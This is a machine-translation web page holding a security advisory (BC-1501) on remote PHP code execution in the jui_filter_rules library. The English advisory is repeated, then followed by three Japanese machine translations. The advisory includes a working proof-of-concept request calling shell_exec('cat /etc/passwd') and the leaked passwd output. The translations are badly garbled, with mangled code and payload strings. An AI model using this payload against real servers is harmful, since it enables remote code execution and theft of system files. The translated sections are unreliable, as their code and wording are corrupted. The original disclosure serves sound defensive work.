テキスト
歴史

-----BEGIN PGP SIGNED MESSAGE-----H

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

PHP Code Execution in jui_filter_rules Parsing Library
======================================================
Researcher: Timo Schmid

Description
===========
jui_filter_rules[1] is a jQuery plugin which allows users to generate a
ruleset
which could be used to filter datasets inside a web application.

The plugin also provides a PHP library to turn the user submitted
ruleset into
SQL where statements for server side filtering.
This PHP library contains a feature which allows to convert the
submitted filter
values with server side functions. These functions can be specified
within the
ruleset, which leads to an arbitrary PHP code execution.

Exploitation Technique
======================
Remote

Severity Level
==============
Critical

CVSS Base Score
===============
6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P)

CVE-ID
======

Impact
======
By using the provided rule parsing library to generate SQL statements, an
attacker is capable of executing arbitrary PHP code in the context of the
web server. This could lead to a full compromise of the web server. The
attack vector could be limited by existing validation mechanisms around the
library, but this would require a partial manual parsing of the user
supplied
rules.

Status
======
Reported

Vulnerable Code Section
=======================
server_side/php/jui_filter_rules.php:
[...]
private function create_filter_value_sql($filter_type, $operator_type, ...
[...]
if(is_array($filter_value_conversion_server_side)) {
$function_name =
$filter_value_conversion_server_side['function_name'];
$args = $filter_value_conversion_server_side['args'];
$arg_len = count($args);
for($i = 0; $i < $vlen; $i++) {
// create arguments values for this filter value
$conversion_args = array();
for($a = 0; $a < $arg_len; $a++) {
if(array_key_exists('filter_value', $args[$a])) {
array_push($conversion_args, $a_values[$i]);
}
if(array_key_exists('value', $args[$a])) {
array_push($conversion_args, $args[$a]['value']);
}
}
// execute user function and assign return value to filter value
try {
$a_values[$i] = call_user_func_array($function_name,
$conversion_args);
} catch(Exception $e) {
$this->last_error = array(
'element_rule_id' => $element_rule_id,
'error_message' => $e->getMessage()
);
break;
}
}
}
[...]

The provided PHP parsing library allows to specify a PHP function to convert
the supplied filter value on the server side. This leads ultimatively to
code
execution through attacker supplied input. As no whitelist approach is used,
any existing PHP function could be executed (including shell commands).

Proof of Concept
================
Using the demo application from the git repository:

Executing shell_exec('cat /etc/passwd')

Request:
POST /ajax_create_sql.dist.php HTTP/1.0
host: http://www.example.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 471

a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=she
ll_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilte
r_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpas
swd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_
ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bco
ndition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=d
ate

Response:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 02:12:33 GMT
Server: Apache/2.2.22 (Debian)
Content-Length: 530
Content-Type: text/html

{"sql":"WHERE
some_field = ?","bind_params":"root:x:0:0:admin
COSMOS:/root:/
bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
s
ys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:ga
mes:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/va
r/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/s
pool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:pr
oxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh"}

Solution
========
This functionality should generally be removed or replaced by a mapping/
whitelist approach and strict type filtering to prevent arbitrary code
execution.

Affected Versions
=================
>= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b
< 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1)

Timeline
========
2015-01-12: Vulnerability found
2015-01-13: Developer informed
2015-02-14: Fixed in version 1.0.6 (git
0b61463cd02cc1814046b516242779b29ba7d1e1)

References
==========
[1] http://www.pontikis.net/labs/jui_filter_rules
[2] https://www.owasp.org/index.php/Code_Injection
[3] https://www.ernw.de/download/BC-1501.txt
[4] https://bufferoverflow.eu/BC-1501.txt

Advisory-ID
===========
BC-1501

Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

- --
Timo Schmid

ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de
Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0

Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey

==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
================== TROOPERS15 ==================
* International IT Security Conference & Workshops
* 16th - 20st March 2015 / Heidelberg, Germany
* www.troopers.de
====================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAEBAwAGBQJU5KMNAAoJEHq2kn1vJmzgroMIAIsvJOdkZLSIjp1bdczg7NFP
YBcVZNXXd7H2LES/bH20wGHMEke2YfL97CfjBk5R1OpBaialTHHi/HrzqbnWft2x
x+u7rOdG0Q+aAAakoBpO7wG1B97+bmXnR6ytgFtxgJO+dfWWwAxhjsqjQ0boRgMr
bzhFkHznlUV2s89n6vEBG2qnowSNqJgnWpbkyekCyISF87bh4nfuNDoj40+aCCNa
Iw3AO8S2bvgVqY980hovoCsW94764/65mVMr2dvTlQx3tR1zTra2km8yq0IOtdIs
AJ8dicIAN0EDuGQKFtLbxkShh4E9spXeQlFRmz1kLa76PELHzJWnyhKUB4o+uds=
=tnwW
-----END PGP SIGNATURE-----

Impact
======
By using the provided rule parsing library to generate SQL statements, an
attacker is capable of executing arbitrary PHP code in the context of the
web server. This could lead to a full compromise of the web server. The
attack vector could be limited by existing validation mechanisms around the
library, but this would require a partial manual parsing of the user
supplied
rules.
 
 
Status
======
Reported
 
 
Vulnerable Code Section
=======================
server_side/php/jui_filter_rules.php:
[...]
private function create_filter_value_sql($filter_type, $operator_type, ...
[...]
 if(is_array($filter_value_conversion_server_side)) {
 $function_name =
$filter_value_conversion_server_side['function_name'];
 $args = $filter_value_conversion_server_side['args'];
 $arg_len = count($args);
 for($i = 0; $i < $vlen; $i++) {
 // create arguments values for this filter value
 $conversion_args = array();
 for($a = 0; $a < $arg_len; $a++) {
 if(array_key_exists('filter_value', $args[$a])) {
 array_push($conversion_args, $a_values[$i]);
 }
 if(array_key_exists('value', $args[$a])) {
 array_push($conversion_args, $args[$a]['value']);
 }
 }
 // execute user function and assign return value to filter value
 try {
 $a_values[$i] = call_user_func_array($function_name,
$conversion_args);
 } catch(Exception $e) {
 $this->last_error = array(
 'element_rule_id' => $element_rule_id,
 'error_message' => $e->getMessage()
 );
 break;
 }
 }
 }
[...]
 
The provided PHP parsing library allows to specify a PHP function to convert
the supplied filter value on the server side. This leads ultimatively to
code
execution through attacker supplied input. As no whitelist approach is used,
any existing PHP function could be executed (including shell commands).
 
 
Proof of Concept
================
Using the demo application from the git repository:
 
Executing shell_exec('cat /etc/passwd')
 
Request:
POST /ajax_create_sql.dist.php HTTP/1.0
host: http://www.example.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 471
 
a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=she
ll_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilte
r_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpas
swd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_
ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bco
ndition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=d
ate
 
Response:
HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 02:12:33 GMT
Server: Apache/2.2.22 (Debian)
Content-Length: 530
Content-Type: text/html
 
{"sql":"WHERE 
some_field = ?","bind_params":"root:x:0:0:admin
COSMOS:/root:/
bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
s
ys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:ga
mes:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/va
r/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/s
pool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:pr
oxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh"}
 
 
 
Solution
========
This functionality should generally be removed or replaced by a mapping/
whitelist approach and strict type filtering to prevent arbitrary code
execution.
 
 
Affected Versions
=================
>= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b
< 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1)
 
 
Timeline
========
2015-01-12: Vulnerability found
2015-01-13: Developer informed
2015-02-14: Fixed in version 1.0.6 (git
0b61463cd02cc1814046b516242779b29ba7d1e1)
 
 
References
==========
[1] http://www.pontikis.net/labs/jui_filter_rules
[2] https://www.owasp.org/index.php/Code_Injection
[3] https://www.ernw.de/download/BC-1501.txt
[4] https://bufferoverflow.eu/BC-1501.txt
 
 
Advisory-ID
===========
BC-1501
 
 
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
 
- -- 
Timo Schmid
 
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de
Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
 
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
 
==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
================== TROOPERS15 ==================
* International IT Security Conference & Workshops
* 16th - 20st March 2015 / Heidelberg, Germany
* www.troopers.de
====================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
 
iQEcBAEBAwAGBQJU5KMNAAoJEHq2kn1vJmzgroMIAIsvJOdkZLSIjp1bdczg7NFP
YBcVZNXXd7H2LES/bH20wGHMEke2YfL97CfjBk5R1OpBaialTHHi/HrzqbnWft2x
x+u7rOdG0Q+aAAakoBpO7wG1B97+bmXnR6ytgFtxgJO+dfWWwAxhjsqjQ0boRgMr
bzhFkHznlUV2s89n6vEBG2qnowSNqJgnWpbkyekCyISF87bh4nfuNDoj40+aCCNa
Iw3AO8S2bvgVqY980hovoCsW94764/65mVMr2dvTlQx3tR1zTra2km8yq0IOtdIs
AJ8dicIAN0EDuGQKFtLbxkShh4E9spXeQlFRmz1kLa76PELHzJWnyhKUB4o+uds=
=tnwW
-----END PGP SIGNATURE-----

0/5000

ソース言語: -

ターゲット言語: -

結果 (日本語) 1: [コピー]

コピーしました！

---開始 PGP 署名メッセージ--ハッシュ: RIPEMD160 Jui_filter_rules 解析ライブラリに PHP コードが実行されます。======================================================研究員: ティモ・シュミット説明===========jui_filter_rules [1] は、ユーザーが生成する jQuery のプラグインをルールセットこれを web アプリケーション内のデータセットをフィルター処理するされる可能性があります。プラグインに携提出されたユーザーを有効にする PHP ライブラリルールセットにSQL をサーバー側のフィルタリングのためのステートメントです。この PHP ライブラリに変換することができる機能が含まれています、送信フィルターサーバー側の機能を持つ値。これらの関数を指定することができます。内で、ルールセットは、任意の PHP コード実行につながる。悪用手法======================リモート重大度レベル==============重要です CVSS 基本スコア===============6.8 （AV:N/AC:M/Au:N/C:P/私は： P/A:P) CVE ID====== 影響======SQL ステートメントを生成する解釈ライブラリ提供のルールを使用して、攻撃者が任意の PHP コードのコンテキストで実行できる、web サーバー。これは web サーバーの完全な妥協につながる可能性があります。、攻撃ベクトル周りの既存の検証メカニズムによって制限される可能性があります、ライブラリ、しかしこれはユーザーの部分的のマニュアルな構文解析を必要とします。供給ルール。ステータス======報告影響を受けるコードセクション=======================server_side/php/jui_filter_rules.php:[...]プライベート関数 create_filter_value_sql ($filter_type, $operator_type.[...]if(is_array($filter_value_conversion_server_side)) {$function_name =$filter_value_conversion_server_side ['function_name'];$args = $filter_value_conversion_server_side ['引数'];$arg_len = count($args);ため ($i = 0; $i < $vlen; $i + +);このフィルター値の引数値を作成します。$conversion_args = 配列（）;ため ($a = 0; $a < $arg_len; $a + +);場合（array_key_exists （'filter_value'、$args[$a])) {array_push ($conversion_args, $a_values[$i]); }場合（array_key_exists ('値'、$args[$a])) {array_push ($conversion_args, $args[$a]['value']); } }ユーザー関数の実行し、フィルター値の戻り値を割り当てる{してみてください。$a_values [$i] = call_user_func_array （$function_name、$conversion_args);} catch (例外 $e);$this → last_error 配列 (='element_rule_id' = > $element_rule_id、'error_message' = > $e → getMessage() );休憩; } } }[...] 変換する PHP 関数を指定することができます提供されている PHP の解析ライブラリサーバー側で指定したフィルター値。これは ultimatively につながるコード攻撃者の実行指定の入力。ホワイトリストのアプローチを使用(シェルコマンドを含む) 既存の PHP 関数が実行されます。概念実証================Git リポジトリからデモアプリケーションを使用してください。 Shell_exec (「の猫/etc/passwd') を実行します。要求:ポスト/ajax_create_sql.dist.php http/1.0ホスト: http://www.example.com要求された X: XMLHttpRequestコンテンツの種類：アプリケーション/x-し-ロードコンテンツの長さ: 471 a_rules % 5B0 %5 D % 5Bfilter_value_conversion_server_side %5 D % 5Bfunction_name %5 D = 彼女はll_exec ＆ a_rules % 5B0 %5 D % 5Bcondition %5 D % 5BfilterValue %5 D = ＆ a_rules % 5B0 %5 D %5bfilter_value_conversion_server_side D % 5% 5Bargs %5 D % 5B0 %5 D % 5Bvalue %5 D = 猫 + % 2Fetc %2fpasswd ＆ pst_placeholder = question_mark ＆ a_rules % 5B0 %5 D % 5Belement_rule_id %5 D = foo & use_ps はい = ＆ a_rules % 5B0 %5 D % 5Bcondition %5 D % 5Bfield %5 D = some_field ＆ a_rules % 5B0 %5 D %5bcondition D % 5% 5Boperator %5 D = 等しい＆ a_rules % 5B0 %5 D % 5Bcondition %5 D % 5BfilterType %5 D = d食べた応答:HTTP/1.1 200 OK日：火曜日 2015 年 1 月 13 日 02時 12分: 33 GMTサーバー: Apache/2.2.22 (Debian)コンテンツの長さ: 530コンテンツの種類：テキスト/html {"sql":"どこ
some_field =?「、」bind_params"："ルート: x: 0:0:adminコスモス：/ルート：/bin/bash
daemon:x:1:1:daemon：/usr/sbin： sh
bin:x:2:2:bin/bin に/:/bin:/bin に/sh
sys: x: 3:3:sys:/dev: sh
sync:x:4:65534:sync/bin に/:/bin:/bin に/sync
games:x:5:60:games：/usr/ゲーム：/bin に/sh
man:x:6:12:man：/var/キャッシュ/男:/bin に/sh
lp:x:7:7:lp:/var/スプール/lpd:/bin に/sh
mail:x:8:8:mail：/var/メール:/bin に/sh
news:x:9:9:news：/var/秒プール/ニュース:/bin に/sh
uucp:x:10:10:uucp：/var/スプール/uucp:/bin に/sh
proxy:x:13:13:prオキシー：/bin:/bin に/sh
www-データ: x: 33:33:www-データ：/var/www:/bin/sh"} ソリューション========この機能一般に除去するか、マッピングによって置き換え/ホワイトリストのアプローチと厳密な型を任意のコードを防ぐためにフィルタリング実行します。影響を受けるバージョン=================> = git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b< 1.0.6 (コミット 0b61463cd02cc1814046b516242779b29ba7d1e1) タイムライン========2015-01-12: 脆弱性の発見2015-01-13: 開発者向けの情報2015-02-14: (git の 1.0.6 以降のバージョンで修正されました。0b61463cd02cc1814046b516242779b29ba7d1e1）参照==========[1] http://www.pontikis.net/labs/jui_filter_rules[2] https://www.owasp.org/index.php/Code_Injection[3] https://www.ernw.de/download/BC-1501.txt[4] https://bufferoverflow.eu/BC-1501.txt アドバイザリ ID===========BC-1501 免責事項==========本明細書で含まれている情報は予告なく変更可能性があります。これの使用情報としての使用のための受諾を構成する状態です。そこなし保証、黙示またはそれ以外の場合は、この情報に関してまたはその使用します。この情報の使用はユーザーの責任です。場合においても、著者/ディストリビューターは、いかなる損害に対しても一切責任を負いませんで開催されます。使用またはこの情報の普及と接続します。 - -- ティモ・シュミット ERNW GmbH, Carl ボッシュ Str. 4, 69115 ハイデルベルク - www.ernw.de電話： +49 6221 48039 0 (HQ) - Fax +49 6221 419008 - 携帯 +49 151 16227192PGP FP 971B D4F7 5DD1 處理 11 FC 2 61 7AB6 927 D 6F26 6CE0 Handelsregister マンハイム: HRB 337135Geschaeftsfuehrer：役行者レイ ==============================================================||ブログ： www.insinuator.net 繁体 | |会議： www.troopers.de 繁体 | |=============================================================== = = TROOPERS15 = = =* 国際的 IT セキュリティ会議＆ワークショップ* 16 21 3 月 2015年/ハイデルベルク、ドイツ* www.troopers.de====================================================---PGP 署名---を開始します。バージョン: GnuPG v2 iQEcBAEBAwAGBQJU5KMNAAoJEHq2kn1vJmzgroMIAIsvJOdkZLSIjp1bdczg7NFPYBcVZNXXd7H2LES/bH20wGHMEke2YfL97CfjBk5R1OpBaialTHHi/HrzqbnWft2xx + u7rOdG0Q + aAAakoBpO7wG1B97 + bmXnR6ytgFtxgJO + dfWWwAxhjsqjQ0boRgMrbzhFkHznlUV2s89n6vEBG2qnowSNqJgnWpbkyekCyISF87bh4nfuNDoj40 + aCCNaIw3AO8S2bvgVqY980hovoCsW94764/65mVMr2dvTlQx3tR1zTra2km8yq0IOtdIsAJ8dicIAN0EDuGQKFtLbxkShh4E9spXeQlFRmz1kLa76PELHzJWnyhKUB4o + uds により == tnwW---PGP 署名を終了--

翻訳されて、しばらくお待ちください..

結果 (日本語) 2:[コピー]

コピーしました！

----- BEGIN PGP SIGNED MESSAGE -----
ハッシュ：RIPEMD160 解析ライブラリjui_filter_rulesでPHPコードが実行される========================== ============================ 研究員：ティモ·シュミット

説明
===========
jui_filter_rules [1]は、ユーザーが生成することができますjQueryのプラグインです
ルールセット
のWebアプリケーション内のデータセットをフィルタリングするために使用することができます。プラグインは、ユーザーを有効にするPHPライブラリを提供しています提出にルールセットを、サーバー側のフィルタリングのためのステートメントが。SQL このPHPライブラリを変換することができる機能が含ま提出フィルタサーバ側の関数で値を。これらの関数は、指定できる範囲内の任意のPHPコードの実行につながる、ルールセット。搾取技術====================== リモート重大度レベル===== ========= 重要なCVSS基本スコア=============== 6.8（AV：N / AC：M /金：N / C：P / I：P / ：P）CVE-ID ======

衝撃
======
SQL文を生成するために設けられたルール解析ライブラリを使用することは、
攻撃者は、のコンテキストで任意のPHPコードを実行することが可能な
ウェブサーバ。これは、Webサーバーの完全な妥協につながる可能性があります。
攻撃ベクトルは、周囲に存在する検証メカニズムによって制限される可能性
ライブラリが、これはユーザの部分的なマニュアル解析が必要となる
供給
ルールを。ステータス====== 報告脆弱コードセクション=========== ============ server_side / PHP / jui_filter_rules.php：[...] プライベート関数create_filter_value_sql（$ FILTER_TYPE、$のoperator_typeを、... [...] 場合（IS_ARRAY（$ filter_value_conversion_server_side））{ $関数名= $ filter_value_conversion_server_side ['関数名']; $ argsに= $ filter_value_conversion_server_side ['引数']; $ arg_len =カウント（$ argsに）; $ iは$ VLENを<; $ iが++）{（$ I = 0のために//このフィルタ値の引数値作成の$ conversion_argsを=配列（）; のために（$ = 0; $ <$ arg_len; $ ++）{ {（array_key_exists（ 'filter_value'、$ argsは[$ A]））の場合array_push（$ conversion_args、$ a_values [$ i]の）; } （array_key_exists（ '値'、$ argsは[$ A]））{場合array_push（$ conversion_args、$ argsは[$ A] ['値']）; } } //ユーザ関数を実行し、値フィルタ、戻り値を代入するのtry { $ a_values [$ i]は=のcall_user_func_arrayを（$関数名、$ conversion_args）; }キャッチ（例外は$ E）{ の$ this - > LAST_ERROR =配列（'element_rule_id」 => $ element_rule_idを、「ERROR_MESSAGE '=> $ E->のgetMessage（））; ブレーク; } } } [...] 提供PHP構文解析ライブラリには、変換するために、PHPの関数を指定することができ、サーバー側で供給されたフィルタ値を。これはにultimativelyつながるコードの攻撃者が供給入力を通じて実行。何ホワイトリストのアプローチが使用されていないため、既存のPHP関数は、（シェル·コマンドを含む）を実行される可能性があります概念実証================ gitリポジトリからデモアプリケーションを使用して：もしくはshell_execの実行（ '猫の/ etc / passwd'）要求：POST /ajax_create_sql.dist.php HTTP / 1.0 ホスト：http://www.example.com X-要求-WITH：XMLHttpRequestをコンテンツタイプ：アプリケーション/ X-WWW-形-urlencoded のContent-Length：200 OK 日：火曜、2015年1月13日午前2時12分33 秒GMTのサーバー：Apacheの/ 2.2.22（Debianの）Content-Lengthの：530 のContent-Type：text / htmlの{"SQL"： " nsome_field = 機能は一般的に削除またはマッピング/に置き換えてくださいホワイトリストアプローチと、任意のコードを防止するための厳格なタイプフィルタリングの実行を。影響を受けたバージョンが================= > = gitのb1e795eeba1bac2f9b0d383cd3da24d6d26ccb4bコミット<1.0を。 6（コミット0b61463cd02cc1814046b516242779b29ba7d1e1）タイムラインは======== 2015年1月12日：脆弱性が見つかりました。開発者通知：2015年1月13日は2015年2月14日：バージョン1.0.6（のgitで修正0b61463cd02cc1814046b516242779b29ba7d1e1）参照の=== ======= [1] http://www.pontikis.net/labs/jui_filter_rules [2] https://www.owasp.org/index.php/Code_Injection [3]にhttps：// WWW。 ernw.de/download/BC-1501.txt [4] https://bufferoverflow.eu/BC-1501.txt 諮問-ID =========== BC-1501 免責事項===== ===== ここに記載されている情報は予告なしに変更されることがあります。これを利用情報がASで使用するために同意したものとみなしすることは条件である。ありNOません、この情報またはそのに関して明示または黙示の保証、使用は。これを任意の使用情報がユーザーの危険にさらされているいかなる場合においても、しなければならない。著者/ ディストリビュータが外かで起因する損害について責任を負いませこの情報の使用または普及との接続。- - ティモ·シュミットERNW社、カール·ボッシュ-STR 。4、69115ハイデルベルク- www.ernw.de 電話。+49 6221 48039から0（HQ） -ファックス+49 6221 419008 -セル49 151 16227192 PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0 Handelsregisterマンハイム：HRB 337135 Geschaeftsfuehrer：役行者レイ======= ================================================== ===== ||ブログ：www.insinuator.net | |会議：www.troopers.de || ========================= ===================================== ============= ===== TROOPERS15 ================== *国際ITセキュリティカンファレンス＆ワークショップ* 16日- 20ST 2015年3月/ハイデルベルク、ドイツ* www.troopers.de === ================================================= - ---- PGP署名----- BEGIN バージョン：GnuPGを PGP署名-----

翻訳されて、しばらくお待ちください..

結果 (日本語) 3:[コピー]

コピーしました！

さんの署名されたメッセージのハッシュpgp開始-----回に1回解析ライブラリ======================================================研究者jui_filter_rules ripemd160 phpのコードを実行します：ティモ・シュミットさんからtschmid ernw de 2回3回説明=========== jui_filter_rules 1 jqueryプラグインを可能にするユーザーを生成するためのルールセットを2回に用いられることができたフィルタデータセット内部のウェブアプリケーション。また、プラグインはサーバー側のフィルタリングのための声明はどこへ提出されたユーザーのルールセットをphpのライブラリを提供します。このライブラリは、サーバ側の機能を有するフィルタ回提出された値に変換することを特徴を含みます。これらの関数は、指定ルールセットの範囲内であることができ、任意のコードの実行を導く。====================== 1回活用テクニックリモート2回の重症度レベル2回==============重要です=============== cvsベーススコア6 . 8（1：n：m ac au：n：p c i p a pですcve-id回未======回1回です======の影響による利用提供されたルールを生成する構文解析ライブラリ2 sql文、攻撃者はwebサーバのコンテキストで任意のコードの実行が可能である。これは、ウェブサーバーの完全な妥協に至ることができます。5攻撃ベクトルの図書館のまわりで既存の検証機構により制限されることができました、しかし、これはユーザの構文解析部分1回手動供給規則を必要とします。2回3回状況報告====== 2回=======================脆弱なコード部3回jui_filter_rules server_side / php / php：……個人的な機能（1 create_filter_value_sql filter_typeドルドル、operator_type 2、……回もしis_array（filter_value_conversion_server_side））function_name 1ドル＝1ドルです」filter_value_conversion_server_side 'function_name、args＝1ドルです」filter_value_conversion_server_side 'argsと回arg_lenドル数args）のために（i＝i 0ドルドルドルvlenは、このフィルタの価値conversion_argsドル＝array()の作成のために引数の値（a＝a 0ドルドルドルarg_lenです）ならば、（array_key_exists（'filter_value」argsはドル））array_push（1ドルのドルconversion_args、a_values i）から（1の場合array_key_exists（'value args」、a 2））array_push（conversion_argsドル、args a」'value）回さんから回を実行するユーザーまたは割り当てる機能と戻り値をフィルタ値tryドル1回a_values i＝call_user_func_array（function_nameドル、1ドルconversion_args）catch例外）この−1 last_error＝アレイ（「element_rule_id」→「element_rule_idドル、error_message」→e→getmessage()）2回、ブレイクからからから…なんて、phpの構文解析ライブラリを指定することができphpの関数に変換するには、供給されたフィルタ値については、サーバ側。このリードを2回ultimativelyコード実行攻撃者を通して供給される入力。ホワイトリストのアプローチを使用していないとして、どんな既存のphpの関数を実行することもできます（シェルコマンドを含む）の概念を用いた3 ================のデモアプリケーションは、gitリポジトリからの証明ですshell_execを実行してください(' etc / passwd）です：ポストの要求ajax_create_sql.dist.php http 1 . 1ホスト：http :// www . example . com x-requested-with：1回xmlhttprequest内容タイプ：ロードコンテンツの長さ：471回ですa_rules割5 b 5 d 5bfilter_value_conversion_server_side 5 d以上であった5bfunction_name 5 d＝1&はll_exec a_rules割5 b 5 d 5bcondition 5 d以上であった5bfiltervalue 5 d＝&a_rules割5 b 5 d 6割5bfilte r_value_conversion_server_side割5割程度であった5bargs d 5 b 5 dであった5bvalue 5 d＝猫2fpas回程度であった2fetc swd&pst_placeholder＝question_mark&a_rules割5 b 5 d 5 dであった5belement_rule_id foo&use_回ps＝はい&a_rules割5 b 5 d 5bcondition 5 d以上であった5bfield 5 d＝some_field&a_rules割5 b 5 d 6割5bco ndition割5割5boperator 5 d＝均等割&a_rules 5 b 5 d 5bcondition 5 d以上であった5bfiltertype 5 d＝d 2に応答して食べました：http 1 . 1 200 ok日付：2015年1月13日火曜日に、02:12:33 gmtサーバ：1 / apache 2 . 2 . 22（2）コンテンツの長さ：内容530型text / htmlです」「sql」が nsome_field＝？」「bind_params」：「根：x：背景：管理回コスモス：ルート：3bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
s
ys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:ga
mes:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/va
r/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/s
pool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:pr
oxy:/ bin / bin / sh nwwwデータ：x 33:33：wwwデータを/ var / www / bin / sh」から2回3回溶液========この機能は一般的に除去されるべきか、マッピング3 whitelistアプローチと厳密型フィルタリングへの任意のコードの実行を防ぐためです。2回3バージョン=================＝gitのコミットb1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b回（1 . . 6に影響する0b61463cd02cc1814046b516242779b29ba7d1e1）です1回のスケジュール======== 2015-01-12：脆弱性です2015-01-13を見つけました：開発者に通知2015-02-14：バージョン1 . . 6回で固定（gitの回です0b61463cd02cc1814046b516242779b29ba7d1e1）2回参照========== 1 http：／／www.pontikis . net /研究所/ 2 jui_filter_rules回https www.owasp . org / index . php code_injection回3 www.ernw https . de /ダウンロード1 bc-1501 . txtを4回https://bufferoverflow.eu/bc-1501.txt 2回諮問idbc-1501 ===========回2回3回断り書き==========情報を変更せずにここに含まれるかもしれません。この情報の使用としての条件で使用するために承認を構成します。そこである保証はされません、あるいはそれ以外の意味は、この情報またはその使用を考慮した。この情報のどんな使用ユーザーの危険にさらされています。イベントにはならないと、著者/回全くの卸売業者から、またはこの情報の使用やスプレッドとの接続に生じた損害を賠償する責任があるとみなされます。2回ティモ・シュミット－ですernw社、carl-bosch-str. 4、69115ハイデルベルグwww.ernw。電話49回1、48039-0（hq）1、ファックス49 419008細胞49 151 16227192回pgp-fp 971b d4f7 5dd1 fced 11fc 2c61 7ab6 927d 6f26 6ce0ですhandelsregisterマンハイム：hrb 337135回geschaeftsfuehrer：遠野レイです==============================================================回| |ブログ：www.insinuator.net | |会議：www.troopers.de | 1回| ============================================================== ================== troopers15 ==================×国際安全保障会議&ワークショップ×16−20 st 3月に2015年ハイデルベルク、ドイツ×www.troopers de回。====================================================回サイン----- ----- pgp 1：gnupg v 2版を開始しますiqecbaebawagbqju5kmnaaojehq2kn1vjmzgromiaisvjodkzlsijp1bdczg7nfp回bh20wghmeke2yfl97cfjbk5r1opbaialthhi ybcvznxxd7h2les−x−hrzqbnwft2x u7rodg0q aaaakobpo7wg1b97 bmxnr6ytgftxgjo dfwwwaxhjsqjq0borgmr bzhfkhznluv2s89n6vebg2qnowsnqjgnwpbkyekcyisf87bh4nfundoj40 accna 1回iw3ao8s2bvgvqy980hovocsw94764×65mvmr2dvtlqx3tr1ztra2km8yq0iotdis 